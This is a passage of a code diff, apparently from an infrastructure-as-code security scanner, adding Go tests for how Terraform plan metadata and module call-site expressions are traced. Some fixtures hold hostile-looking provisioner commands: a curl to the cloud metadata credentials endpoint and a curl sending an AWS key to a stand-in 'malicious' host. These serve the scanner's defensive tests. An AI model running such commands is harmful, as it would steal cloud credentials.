+		"address":                   "aws_s3_bucket.data[\"a]b\"]",
+		"after_unknown":             map[string]interface{}{"id": true},
+		"configuration_expressions": map[string]interface{}{"bucket": map[string]interface{}{"references": []interface{}{"var.bucket_name"}}},
+	}, meta("aws_s3_bucket", "data[\"a]b\"]"))
+
+	require.Equal(t, map[string]interface{}{
+		"address":                   "aws_s3_bucket.data[\"a\\\"b\"]",
+		"after_unknown":             map[string]interface{}{"id": true},
+		"configuration_expressions": map[string]interface{}{"bucket": map[string]interface{}{"references": []interface{}{"var.bucket_name"}}},
+	}, meta("aws_s3_bucket", "data[\"a\\\"b\"]"))
+
+	require.Equal(t, map[string]interface{}{
+		"address":                   "module.networking.aws_subnet.public",
+		"after_unknown":             map[string]interface{}{"id": true},
+		"configuration_expressions": map[string]interface{}{"cidr_block": map[string]interface{}{"references": []interface{}{"var.subnet_cidr"}}},
+	}, meta("aws_subnet", "module.networking.public"))
+}
+
+func TestJson_parseTFPlan_dd_tfplan_meta_provisioners(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"resources": []map[string]interface{}{
+					{
+						"address": "aws_instance.web",
+						"mode":    "managed",
+						"type":    "aws_instance",
+						"name":    "web",
+						"values":  map[string]interface{}{"instance_type": "t2.micro"},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"resources": []map[string]interface{}{
+					{
+						"address": "aws_instance.web",
+						"expressions": map[string]interface{}{
+							"instance_type": map[string]interface{}{"constant_value": "t2.micro"},
+						},
+						"provisioners": []map[string]interface{}{
+							{
+								"type": "local-exec",
+								"expressions": map[string]interface{}{
+									"command": map[string]interface{}{"constant_value": "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/"},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+	require.True(t, ok)
+	entry := ddMeta["aws_instance"].(map[string]interface{})["web"].(map[string]interface{})
+
+	require.Equal(t, []interface{}{
+		map[string]interface{}{
+			"type": "local-exec",
+			"expressions": map[string]interface{}{
+				"command": map[string]interface{}{"constant_value": "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/"},
+			},
+		},
+	}, entry["provisioners"])
+}
+
+// TestJson_parseTFPlan_dd_tfplan_meta_module_call_var_constant_attached
+// covers a literal call-site constant, exposed via call_site_expressions.
+func TestJson_parseTFPlan_dd_tfplan_meta_module_call_var_constant_attached(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"child_modules": []map[string]interface{}{
+					{
+						"address": "module.instance",
+						"resources": []map[string]interface{}{
+							{
+								"address": "module.instance.aws_instance.web",
+								"mode":    "managed",
+								"type":    "aws_instance",
+								"name":    "web",
+								"values":  map[string]interface{}{},
+							},
+						},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"module_calls": map[string]interface{}{
+					"instance": map[string]interface{}{
+						"expressions": map[string]interface{}{
+							"user_data": map[string]interface{}{"constant_value": "IyEvYmluL2Jhc2gKZWNobyBoaQ=="},
+						},
+						"module": map[string]interface{}{
+							"resources": []map[string]interface{}{
+								{
+									"address": "aws_instance.web",
+									"expressions": map[string]interface{}{
+										"user_data": map[string]interface{}{"references": []string{"var.user_data"}},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+	require.True(t, ok)
+	entry := ddMeta["aws_instance"].(map[string]interface{})["module.instance.web"].(map[string]interface{})
+
+	require.Equal(t, map[string]interface{}{
+		"user_data": map[string]interface{}{
+			"references": []interface{}{"var.user_data"},
+			"call_site_expressions": []interface{}{
+				map[string]interface{}{"constant_value": "IyEvYmluL2Jhc2gKZWNobyBoaQ=="},
+			},
+		},
+	}, entry["configuration_expressions"])
+}
+
+// TestJson_parseTFPlan_dd_tfplan_meta_module_call_var_reference_attached
+// covers a reference passed as a variable: references stays unspliced.
+func TestJson_parseTFPlan_dd_tfplan_meta_module_call_var_reference_attached(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"child_modules": []map[string]interface{}{
+					{
+						"address": "module.instance",
+						"resources": []map[string]interface{}{
+							{
+								"address": "module.instance.aws_instance.web",
+								"mode":    "managed",
+								"type":    "aws_instance",
+								"name":    "web",
+								"values":  map[string]interface{}{},
+							},
+						},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"module_calls": map[string]interface{}{
+					"instance": map[string]interface{}{
+						"expressions": map[string]interface{}{
+							"subnet_ref": map[string]interface{}{
+								"references": []string{"aws_subnet.my_subnet.id", "aws_subnet.my_subnet"},
+							},
+						},
+						"module": map[string]interface{}{
+							"resources": []map[string]interface{}{
+								{
+									"address": "aws_instance.web",
+									"expressions": map[string]interface{}{
+										"subnet_id": map[string]interface{}{"references": []string{"var.subnet_ref"}},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+	require.True(t, ok)
+	entry := ddMeta["aws_instance"].(map[string]interface{})["module.instance.web"].(map[string]interface{})
+
+	require.Equal(t, map[string]interface{}{
+		"subnet_id": map[string]interface{}{
+			"references": []interface{}{"var.subnet_ref"},
+			"call_site_expressions": []interface{}{
+				map[string]interface{}{
+					"references": []interface{}{"aws_subnet.my_subnet.id", "aws_subnet.my_subnet"},
+				},
+			},
+		},
+	}, entry["configuration_expressions"])
+}
+
+// Regression fixture from a real plan: var.x and base64encode(var.x) serialize
+// identically, so neither is asserted equal to the other.
+func TestJson_parseTFPlan_dd_tfplan_meta_module_call_var_wrapped_reference_not_asserted_equal(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"child_modules": []map[string]interface{}{
+					{
+						"address": "module.child",
+						"resources": []map[string]interface{}{
+							{
+								"address": "module.child.null_resource.test",
+								"mode":    "managed",
+								"type":    "null_resource",
+								"name":    "test",
+								"values":  map[string]interface{}{},
+							},
+						},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"module_calls": map[string]interface{}{
+					"child": map[string]interface{}{
+						// Real plan output for base64encode(var.outer_cmd), identical
+						// to what a bare wrapped_cmd = var.outer_cmd would produce.
+						"expressions": map[string]interface{}{
+							"wrapped_cmd": map[string]interface{}{"references": []string{"var.outer_cmd"}},
+						},
+						"module": map[string]interface{}{
+							"resources": []map[string]interface{}{
+								{
+									"address": "null_resource.test",
+									"expressions": map[string]interface{}{
+										"triggers": map[string]interface{}{"references": []string{"var.wrapped_cmd"}},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+	require.True(t, ok)
+	entry := ddMeta["null_resource"].(map[string]interface{})["module.child.test"].(map[string]interface{})
+
+	// references stays "var.wrapped_cmd" - never replaced with the caller's own.
+	require.Equal(t, map[string]interface{}{
+		"triggers": map[string]interface{}{
+			"references": []interface{}{"var.wrapped_cmd"},
+			"call_site_expressions": []interface{}{
+				map[string]interface{}{"references": []interface{}{"var.outer_cmd"}},
+			},
+		},
+	}, entry["configuration_expressions"])
+}
+
+// Uses a child module so callArgs is non-empty; the sibling reference must
+// survive untouched alongside the resolved var.env.
+func TestJson_parseTFPlan_dd_tfplan_meta_module_call_var_multi_reference_preserved(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"child_modules": []map[string]interface{}{
+					{
+						"address": "module.instance",
+						"resources": []map[string]interface{}{
+							{
+								"address": "module.instance.aws_instance.web",
+								"mode":    "managed",
+								"type":    "aws_instance",
+								"name":    "web",
+								"values":  map[string]interface{}{},
+							},
+						},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"module_calls": map[string]interface{}{
+					"instance": map[string]interface{}{
+						"expressions": map[string]interface{}{
+							"env": map[string]interface{}{
+								"references": []string{"aws_vpc.env_tag.value"},
+							},
+						},
+						"module": map[string]interface{}{
+							"resources": []map[string]interface{}{
+								{
+									"address": "aws_instance.web",
+									"expressions": map[string]interface{}{
+										"tags": map[string]interface{}{
+											"references": []string{"var.env", "aws_vpc.main.id"},
+										},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+	require.True(t, ok)
+	entry := ddMeta["aws_instance"].(map[string]interface{})["module.instance.web"].(map[string]interface{})
+
+	require.Equal(t, map[string]interface{}{
+		"tags": map[string]interface{}{
+			"references": []interface{}{"var.env", "aws_vpc.main.id"},
+			"call_site_expressions": []interface{}{
+				map[string]interface{}{"references": []interface{}{"aws_vpc.env_tag.value"}},
+			},
+		},
+	}, entry["configuration_expressions"])
+}
+
+// "var.settings.selected" and "var.settings" appear together; the bare
+// "var.settings" must not get call_site_expressions attached.
+func TestJson_parseTFPlan_dd_tfplan_meta_module_call_var_object_traversal_left_unresolved(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"child_modules": []map[string]interface{}{
+					{
+						"address": "module.instance",
+						"resources": []map[string]interface{}{
+							{
+								"address": "module.instance.aws_cloudwatch_log_metric_filter.web",
+								"mode":    "managed",
+								"type":    "aws_cloudwatch_log_metric_filter",
+								"name":    "web",
+								"values":  map[string]interface{}{},
+							},
+						},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"module_calls": map[string]interface{}{
+					"instance": map[string]interface{}{
+						"expressions": map[string]interface{}{
+							"settings": map[string]interface{}{
+								"references": []string{"aws_cloudwatch_log_metric_filter.target.name"},
+							},
+						},
+						"module": map[string]interface{}{
+							"resources": []map[string]interface{}{
+								{
+									"address": "aws_cloudwatch_log_metric_filter.web",
+									"expressions": map[string]interface{}{
+										"name": map[string]interface{}{
+											"references": []string{"var.settings.selected", "var.settings"},
+										},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+	require.True(t, ok)
+	entry := ddMeta["aws_cloudwatch_log_metric_filter"].(map[string]interface{})["module.instance.web"].(map[string]interface{})
+
+	require.Equal(t, map[string]interface{}{
+		"name": map[string]interface{}{
+			"references": []interface{}{"var.settings.selected", "var.settings"},
+		},
+	}, entry["configuration_expressions"])
+}
+
+// A provisioner command reading var.command against a literal caller arg
+// gets that literal exposed under call_site_expressions.
+func TestJson_parseTFPlan_dd_tfplan_meta_provisioner_constant_argument_attached(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"child_modules": []map[string]interface{}{
+					{
+						"address": "module.child",
+						"resources": []map[string]interface{}{
+							{
+								"address": "module.child.aws_instance.web",
+								"mode":    "managed",
+								"type":    "aws_instance",
+								"name":    "web",
+								"values":  map[string]interface{}{},
+							},
+						},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"module_calls": map[string]interface{}{
+					"child": map[string]interface{}{
+						"expressions": map[string]interface{}{
+							"command": map[string]interface{}{
+								"constant_value": "curl http://malicious/-H 'Authorization: AKIA...'",
+							},
+						},
+						"module": map[string]interface{}{
+							"resources": []map[string]interface{}{
+								{
+									"address": "aws_instance.web",
+									"provisioners": []map[string]interface{}{
+										{
+											"type": "local-exec",
+											"expressions": map[string]interface{}{
+												"command": map[string]interface{}{"references": []string{"var.command"}},
+											},
+										},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+	require.True(t, ok)
+	entry := ddMeta["aws_instance"].(map[string]interface{})["module.child.web"].(map[string]interface{})
+
+	require.Equal(t, []interface{}{
+		map[string]interface{}{
+			"type": "local-exec",
+			"expressions": map[string]interface{}{
+				"command": map[string]interface{}{
+					"references": []interface{}{"var.command"},
+					"call_site_expressions": []interface{}{
+						map[string]interface{}{"constant_value": "curl http://malicious/-H 'Authorization: AKIA...'"},
+					},
+				},
+			},
+		},
+	}, entry["provisioners"])
+}
+
+// A constant threaded through two module hops, each with a different
+// argument name, must produce an ordered chain, not one collapsed value.
+func TestJson_parseTFPlan_dd_tfplan_meta_provisioner_constant_transitive_across_two_modules(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"child_modules": []map[string]interface{}{
+					{
+						"address": "module.a",
+						"child_modules": []map[string]interface{}{
+							{
+								"address": "module.a.module.b",
+								"resources": []map[string]interface{}{
+									{
+										"address": "module.a.module.b.aws_instance.web",
+										"mode":    "managed",
+										"type":    "aws_instance",
+										"name":    "web",
+										"values":  map[string]interface{}{},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"module_calls": map[string]interface{}{
+					"a": map[string]interface{}{
+						"expressions": map[string]interface{}{
+							"outer_cmd": map[string]interface{}{
+								"constant_value": "curl http://malicious/-H 'Authorization: AKIA...'",
+							},
+						},
+						"module": map[string]interface{}{
+							"module_calls": map[string]interface{}{
+								"b": map[string]interface{}{
+									"expressions": map[string]interface{}{
+										"inner_cmd": map[string]interface{}{"references": []string{"var.outer_cmd"}},
+									},
+									"module": map[string]interface{}{
+										"resources": []map[string]interface{}{
+											{
+												"address": "aws_instance.web",
+												"provisioners": []map[string]interface{}{
+													{
+														"type": "local-exec",
+														"expressions": map[string]interface{}{
+															"command": map[string]interface{}{"references": []string{"var.inner_cmd"}},
+														},
+													},
+												},
+											},
+										},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+	require.True(t, ok)
+	entry := ddMeta["aws_instance"].(map[string]interface{})["module.a.module.b.web"].(map[string]interface{})
+
+	require.Equal(t, []interface{}{
+		map[string]interface{}{
+			"type": "local-exec",
+			"expressions": map[string]interface{}{
+				"command": map[string]interface{}{
+					"references": []interface{}{"var.inner_cmd"},
+					"call_site_expressions": []interface{}{
+						// outermost first: module.a's own call-site expression,
+						// then module.b's own call-site expression.
+						map[string]interface{}{"constant_value": "curl http://malicious/-H 'Authorization: AKIA...'"},
+						map[string]interface{}{"references": []interface{}{"var.outer_cmd"}},
+					},
+				},
+			},
+		},
+	}, entry["provisioners"])
+}
+
+// A two-level module chain must resolve transitively without splicing
+// references; call_site_expressions carries the ordered chain instead.
+func TestJson_parseTFPlan_dd_tfplan_meta_module_call_var_nested_resolution(t *testing.T) {
+	doc := model.Document{
+		"format_version":    "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"child_modules": []map[string]interface{}{
+					{
+						"address": "module.a",
+						"child_modules": []map[string]interface{}{
+							{
+								"address": "module.a.module.b",
+								"resources": []map[string]interface{}{
+									{
+										"address": "module.a.module.b.aws_instance.web",
+										"mode":    "managed",
+										"type":    "aws_instance",
+										"name":    "web",
+										"values":  map[string]interface{}{},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+		"resource_changes": []map[string]interface{}{},
+		"configuration": map[string]interface{}{
+			"root_module": map[string]interface{}{
+				"module_calls": map[string]interface{}{
+					"a": map[string]interface{}{
+						"expressions": map[string]interface{}{
+							"input": map[string]interface{}{
+								"references": []string{"aws_subnet.my_subnet.id", "aws_subnet.my_subnet"},
+							},
+						},
+						"module": map[string]interface{}{
+							"module_calls": map[string]interface{}{
+								"b": map[string]interface{}{
+									"expressions": map[string]interface{}{
+										"input": map[string]interface{}{"references": []string{"var.input"}},
+									},
+									"module": map[string]interface{}{
+										"resources": []map[string]interface{}{
+											{
+												"address": "aws_instance.web",
+												"expressions": map[string]interface{}{
+													"subnet_id": map[string]interface{}{"references": []string{"var.input"}},
+												},
+											},
+										},
+									},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	got, err := parseTFPlan(doc)
+	require.NoError(t, err)
+
+	ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+	require.True(t, ok)
+	entry := ddMeta["aws_instance"].(map[string]interface{})["module.a.module.b.web"].(map[string]interface{})
+
+	require.Equal(t, map[string]interface{}{
+		"subnet_id": map[string]interface{}{
+			"references": []interface{}{"var.input"},
+			"call_site_expressions": []interface{}{
+				map[string]interface{}{
+					"references": []interface{}{"aws_subnet.my_subnet.id", "aws_subnet.my_subnet"},
+				},
+				map[string]interface{}{"references": []interface{}{"var.input"}},
+			},
+		},
+	}, entry["configuration_expressions"])
+}
+
+// Regression test: a branching module chain must produce a linear-length
+// chain, not exponential (was 1,048,574 entries at depth=18 before dedup).
+func TestJson_parseTFPlan_dd_tfplan_meta_call_site_chain_grows_linearly_not_exponentially(t *testing.T) {
+	const depth = 18
+
+	buildDoc := func(depth int) model.Document {
+		moduleCalls := map[string]interface{}{
+			"expressions": map[string]interface{}{
+				"x": map[string]interface{}{"references": []string{"aws_instance.r1.id"}},
+				"y": map[string]interface{}{"references": []string{"aws_instance.r2.id"}},
+			},
+		}
+		cur := moduleCalls
+		plannedRoot := map[string]interface{}{"address": "module.a"}
+		curPlanned := plannedRoot
+		modulePath := "module.a"
+		for i := 0; i < depth; i++ {
+			next := map[string]interface{}{
+				"expressions": map[string]interface{}{
+					"x": map[string]interface{}{"references": []string{"var.x", "var.y"}},
+					"y": map[string]interface{}{"references": []string{"var.x", "var.y"}},
+				},
+			}
+			cur["module"] = map[string]interface{}{
+				"module_calls": map[string]interface{}{"m": next},
+			}
+			cur = next
+
+			nextPlanned := map[string]interface{}{"address": modulePath + ".module.m"}
+			curPlanned["child_modules"] = []map[string]interface{}{nextPlanned}
+			curPlanned = nextPlanned
+			modulePath += ".module.m"
+		}
+		cur["module"] = map[string]interface{}{
+			"resources": []map[string]interface{}{
+				{
+					"address": "aws_instance.leaf",
+					"expressions": map[string]interface{}{
+						"subnet_id": map[string]interface{}{"references": []string{"var.x", "var.y"}},
+					},
+				},
+			},
+		}
+		curPlanned["resources"] = []map[string]interface{}{
+			{
+				"address": modulePath + ".aws_instance.leaf",
+				"mode":    "managed",
+				"type":    "aws_instance",
+				"name":    "leaf",
+				"values":  map[string]interface{}{},
+			},
+		}
+
+		return model.Document{
+			"format_version":    "1.2",
+			"terraform_version": "1.5.0",
+			"planned_values": map[string]interface{}{
+				"root_module": map[string]interface{}{
+					"child_modules": []map[string]interface{}{plannedRoot},
+				},
+			},
+			"resource_changes": []map[string]interface{}{},
+			"configuration": map[string]interface{}{
+				"root_module": map[string]interface{}{
+					"module_calls": map[string]interface{}{"a": moduleCalls},
+				},
+			},
+		}
+	}
+
+	chainLength := func(depth int) int {
+		got, err := parseTFPlan(buildDoc(depth))
+		require.NoError(t, err)
+
+		ddMeta, ok := got["_dd_tfplan_meta"].(map[string]interface{})
+		require.True(t, ok)
+		byType, ok := ddMeta["aws_instance"].(map[string]interface{})
+		require.True(t, ok)
+		require.Len(t, byType, 1)
+		var entry map[string]interface{}
+		for _, v := range byType {
+			entry = v.(map[string]interface{})
+		}
+		cfgExpr, ok := entry["configuration_expressions"].(map[string]interface{})
+		require.True(t, ok)
+		subnetID, ok := cfgExpr["subnet_id"].(map[string]interface{})
+		require.True(t, ok)
+		chain, ok := subnetID["call_site_expressions"].([]interface{})
+		require.True(t, ok, "expected a call_site_expressions chain")
+		return len(chain)
+	}
+
+	full := chainLength(depth)
+	half := chainLength(depth / 2)
+
+	// Exponential growth would make full roughly half*half; linear caps the ratio.
+	require.Less(t, full, half*10,
+		"call_site_expressions grew super-linearly: depth=%d -> %d entries, depth=%d -> %d entries",
+		depth, full, depth/2, half)
+	require.Less(t, full, 100,
+		"call_site_expressions should stay proportional to the number of real call sites (depth=%d), not explode to %d", depth, full)
 }

--- a/pkg/runner/service.go
+++ b/pkg/runner/service.go
@@ -351,29 +351,41 @@ func prepareScanDocument(body map[string]interface{}, kind model.FileKind) (map[
 }
 
 func prepareScanDocumentRoot(body interface{}, kind model.FileKind) {
+	prepareScanDocumentNode(body, kind, true, true)
+}
+
+// For Terraform-plan documents, pattern rewriting is scoped to the top-level
+// "resource" subtree, so resource_changes/configuration stay byte-identical to the raw plan.
+func prepareScanDocumentNode(body interface{}, kind model.FileKind, resolveFilters, atDocumentRoot bool) {
 	switch bodyType := body.(type) {
 	case map[string]interface{}:
-		prepareScanDocumentValue(bodyType, kind)
+		prepareScanDocumentValue(bodyType, kind, resolveFilters, atDocumentRoot)
 	case []interface{}:
 		for _, indx := range bodyType {
-			prepareScanDocumentRoot(indx, kind)
+			prepareScanDocumentNode(indx, kind, resolveFilters, false)
 		}
 	}
 }
 
-func prepareScanDocumentValue(bodyType map[string]interface{}, kind model.FileKind) {
+func prepareScanDocumentValue(bodyType map[string]interface{}, kind model.FileKind, resolveFilters, atDocumentRoot bool) {
 	delete(bodyType, "_dd_lines")
 	for key, v := range bodyType {
+		childResolveFilters := resolveFilters
+		if kind == model.KindTerraformPlan && atDocumentRoot {
+			childResolveFilters = key == "resource"
+		}
 		switch value := v.(type) {
 		case map[string]interface{}:
-			prepareScanDocumentRoot(value, kind)
+			prepareScanDocumentNode(value, kind, childResolveFilters, false)
 		case []interface{}:
 			for _, indx := range value {
-				prepareScanDocumentRoot(indx, kind)
+				prepareScanDocumentNode(indx, kind, childResolveFilters, false)
 			}
 		case string:
-			if field, ok := lines[kind]; ok && utils.Contains(key, field) {
-				bodyType[key] = resolveJSONFilter(value)
+			if resolveFilters {
+				if field, ok := lines[kind]; ok && utils.Contains(key, field) {
+					bodyType[key] = resolveJSONFilter(value)
+				}
 			}
 		}
 	}

--- a/pkg/runner/sink.go
+++ b/pkg/runner/sink.go
@@ -25,9 +25,10 @@ import (
 
 var (
 	lines = map[model.FileKind][]string{
-		"TF":   {"pattern"},
-		"JSON": {"FilterPattern"},
-		"YAML": {"filter_pattern", "FilterPattern"},
+		"TF":     {"pattern"},
+		"TFPLAN": {"pattern"},
+		"JSON":   {"FilterPattern"},
+		"YAML":   {"filter_pattern", "FilterPattern"},
 	}
 )
 

--- a/pkg/runner/sink_test.go
+++ b/pkg/runner/sink_test.go
@@ -13,6 +13,7 @@ import (
 
 	"github.com/DataDog/datadog-iac-scanner/pkg/model"
 	"github.com/DataDog/datadog-iac-scanner/pkg/parser"
+	jsonParser "github.com/DataDog/datadog-iac-scanner/pkg/parser/json"
 	yamlParser "github.com/DataDog/datadog-iac-scanner/pkg/parser/yaml/default"
 	"github.com/rs/zerolog"
 	"github.com/stretchr/testify/require"
@@ -118,6 +119,67 @@ func TestKics_prepareDocument(t *testing.T) {
 
 			`,
 		},
+		{
+			// Flat (not wrapped in "document":[...]) to match sink.go's real per-document input.
+			name: "prepare document resolves pattern for terraform plan documents",
+			args: args{
+				bodyType: `
+				{
+					"resource": {
+					  "aws_cloudwatch_log_metric_filter": {
+						"cis_changes_nacl": {
+						  "name": "CIS-4.11-Changes-NACL",
+						  "pattern": "{ ($.eventName = CreateNetworkAcl) || ($.eventName = CreateNetworkAclEntry) }",
+						  "log_group_name": "aws_cloudwatch_log_group.CIS_CloudWatch_LogsGroup"
+						}
+					  }
+					},
+					"configuration": {
+					  "root_module": {
+						"resources": [
+						  {
+							"address": "aws_cloudwatch_log_metric_filter.cis_changes_nacl",
+							"expressions": {
+							  "pattern": {
+								"constant_value": "{ ($.eventName = CreateNetworkAcl) || ($.eventName = CreateNetworkAclEntry) }"
+							  }
+							}
+						  }
+						]
+					  }
+					}
+				  }
+				`,
+				kind: model.KindTerraformPlan,
+			},
+			want: `
+			{
+				"resource": {
+				  "aws_cloudwatch_log_metric_filter": {
+					"cis_changes_nacl": {
+					  "log_group_name": "aws_cloudwatch_log_group.CIS_CloudWatch_LogsGroup",
+					  "name": "CIS-4.11-Changes-NACL",
+					  "pattern": "{\"_dd_filter_expr\":{\"_op\":\"||\",\"_left\":{\"_selector\":\"$.eventName\",\"_op\":\"=\",\"_value\":\"CreateNetworkAcl\"},\"_right\":{\"_selector\":\"$.eventName\",\"_op\":\"=\",\"_value\":\"CreateNetworkAclEntry\"}},\"_kics_filter_expr\":{\"_op\":\"||\",\"_left\":{\"_selector\":\"$.eventName\",\"_op\":\"=\",\"_value\":\"CreateNetworkAcl\"},\"_right\":{\"_selector\":\"$.eventName\",\"_op\":\"=\",\"_value\":\"CreateNetworkAclEntry\"}}}"
+					}
+				  }
+				},
+				"configuration": {
+				  "root_module": {
+					"resources": [
+					  {
+						"address": "aws_cloudwatch_log_metric_filter.cis_changes_nacl",
+						"expressions": {
+						  "pattern": {
+							"constant_value": "{ ($.eventName = CreateNetworkAcl) || ($.eventName = CreateNetworkAclEntry) }"
+						  }
+						}
+					  }
+					]
+				  }
+				}
+			  }
+			`,
+		},
 	}
 
 	ctx := context.Background()
@@ -131,6 +193,150 @@ func TestKics_prepareDocument(t *testing.T) {
 			compareJSONLine(t, got, tt.want)
 		})
 	}
+}
+
+// TestSink_TFPlanExposesAfterUnknownAndConfiguration drives a plan through the
+// real Parser.Parse -> PrepareScanDocument pipeline used in production.
+func TestSink_TFPlanExposesAfterUnknownAndConfiguration(t *testing.T) {
+	ctx := context.Background()
+
+	planJSON := []byte(`{
+		"format_version": "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": {
+			"root_module": {
+				"resources": [
+					{
+						"address": "aws_s3_bucket.main",
+						"mode": "managed",
+						"type": "aws_s3_bucket",
+						"name": "main",
+						"values": {
+							"acl": "private"
+						}
+					}
+				]
+			}
+		},
+		"resource_changes": [
+			{
+				"address": "aws_s3_bucket.main",
+				"mode": "managed",
+				"type": "aws_s3_bucket",
+				"name": "main",
+				"change": {
+					"actions": ["create"],
+					"before": null,
+					"after": {
+						"acl": "private"
+					},
+					"after_unknown": {
+						"bucket": true,
+						"id": true
+					}
+				}
+			}
+		],
+		"configuration": {
+			"root_module": {
+				"resources": [
+					{
+						"address": "aws_s3_bucket.main",
+						"mode": "managed",
+						"type": "aws_s3_bucket",
+						"name": "main",
+						"expressions": {
+							"bucket": {
+								"references": ["random_id.suffix"]
+							}
+						}
+					}
+				]
+			}
+		}
+	}`)
+
+	p := &jsonParser.Parser{}
+	_, docs, _, _, err := p.Parse(ctx, planJSON, "tfplan.json", false, 15)
+	require.NoError(t, err)
+	require.Len(t, docs, 1)
+
+	kind, ok := p.KindForContent(planJSON)
+	require.True(t, ok)
+	require.Equal(t, model.KindTerraformPlan, kind)
+
+	prepared := PrepareScanDocument(ctx, docs[0], kind)
+
+	require.Contains(t, prepared, "resource")
+	require.Contains(t, prepared, "resource_changes")
+	require.Contains(t, prepared, "configuration")
+
+	b, err := json.Marshal(prepared)
+	require.NoError(t, err)
+	require.NotContains(t, string(b), "_dd_lines",
+		"line-tracking metadata must not leak into resource_changes/configuration")
+
+	require.JSONEq(t, `{
+		"resource": {
+			"aws_s3_bucket": {
+				"main": {
+					"acl": "private"
+				}
+			}
+		},
+		"_dd_tfplan_meta": {
+			"aws_s3_bucket": {
+				"main": {
+					"address": "aws_s3_bucket.main",
+					"after_unknown": {
+						"bucket": true,
+						"id": true
+					},
+					"configuration_expressions": {
+						"bucket": {
+							"references": ["random_id.suffix"]
+						}
+					}
+				}
+			}
+		},
+		"resource_changes": [
+			{
+				"address": "aws_s3_bucket.main",
+				"mode": "managed",
+				"type": "aws_s3_bucket",
+				"name": "main",
+				"change": {
+					"actions": ["create"],
+					"before": null,
+					"after": {
+						"acl": "private"
+					},
+					"after_unknown": {
+						"bucket": true,
+						"id": true
+					}
+				}
+			}
+		],
+		"configuration": {
+			"root_module": {
+				"resources": [
+					{
+						"address": "aws_s3_bucket.main",
+						"mode": "managed",
+						"type": "aws_s3_bucket",
+						"name": "main",
+						"expressions": {
+							"bucket": {
+								"references": ["random_id.suffix"]
+							}
+						}
+					}
+				]
+			}
+		}
+	}`, string(b))
 }
 
 func TestKics_resolveCRLFFile(t *testing.T) {

--- a/pkg/runner/tfplan_meta_isolation_test.go
